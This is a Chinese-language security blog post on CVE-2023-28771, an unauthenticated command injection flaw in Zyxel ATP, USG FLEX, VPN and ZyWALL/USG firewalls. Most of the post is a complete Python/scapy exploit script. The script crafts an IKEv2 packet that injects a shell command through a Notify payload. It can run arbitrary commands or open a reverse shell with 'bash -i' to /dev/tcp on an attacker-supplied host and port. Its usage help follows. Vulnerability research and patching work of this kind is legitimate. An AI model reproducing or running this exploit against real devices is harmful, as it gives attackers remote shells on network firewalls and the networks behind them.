探索网络安全新技术
攀登黑客技术最高峰

CVE-2023-28771:Zyxel Firewalls 防火墙命令注入漏洞(含POC)

CVE-2023-28771:Zyxel Firewalls 防火墙命令注入漏洞(含POC)-威武网安

漏洞描述

Zyxel ZyWALL/USG 系列固件版本 4.60 到 4.73、VPN 系列固件版本 4.60 到 5.35、USG FLEX 系列固件版本 4.60 到 5.35 以及 ATP 系列固件版本 4.60 到 5.35 中的错误消息处理不当,这可能允许未经身份验证的攻击者执行通过向受影响的设备发送精心制作的数据包来远程执行某些操作系统命令。

风险等级

影响产品

ATP防火墙(固件版本在4.60 至 5.35)

USG FLEX(固件版本在4.60至5.35)

VPN(固件版本在内4.60至5.35)

ZyWALL/USG(固件版本在4.60至4.73)

漏洞POC

需要用于发送 IKE 数据包的 scapy Python 库

#!/usr/bin/python3
import sys
from scapy.all import *
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("rhost")
parser.add_argument("--cmd")
parser.add_argument("--lhost")
parser.add_argument("--lport")
args = parser.parse_args()

load_contrib('ikev2')

if args.cmd is not None:
	cmd = "\";bash -c \"" + args.cmd + "\";echo -n \""
elif args.lhost and args.lport:
	cmd = "\";bash -c \"exec bash -i &>/dev/tcp/" + args.lhost + "/" + args.lport + " <&1;\";echo -n \""
else:
	print("Check your syntax, and try again")
	sys.exit()


packet = IP(dst = args.rhost) / UDP(dport = 500) / IKEv2(init_SPI = RandString(8), next_payload = 'Notify', exch_type = 'IKE_SA_INIT', flags='Initiator') / IKEv2_payload_Notify(next_payload = 'Nonce', type = 14, load = "HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB" + cmd) / IKEv2_payload_Nonce(next_payload = 'None', load = RandString(68))

send(packet)

POC使用

usage: CVE-2023-28771.py [-h] [--cmd CMD] [--lhost LHOST] [--lport LPORT] rhost

positional arguments:
  rhost

options:
  -h, --help     show this help message and exit
  --cmd CMD
  --lhost LHOST
  --lport LPORT

使用 –cmd 运行任意命令,或使用 –lport 和 –lhost 生成一个 revshell。

打赏
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《CVE-2023-28771:Zyxel Firewalls 防火墙命令注入漏洞(含POC)》
文章链接:https://www.wevul.com/1391.html
本站所有内容均来自互联网,只限个人技术研究,禁止商业用途,请下载后24小时内删除。

文章推荐

如果文章对您有帮助 请不要吝啬 打赏一下小站

支付宝扫一扫打赏

微信扫一扫打赏

登录

找回密码

注册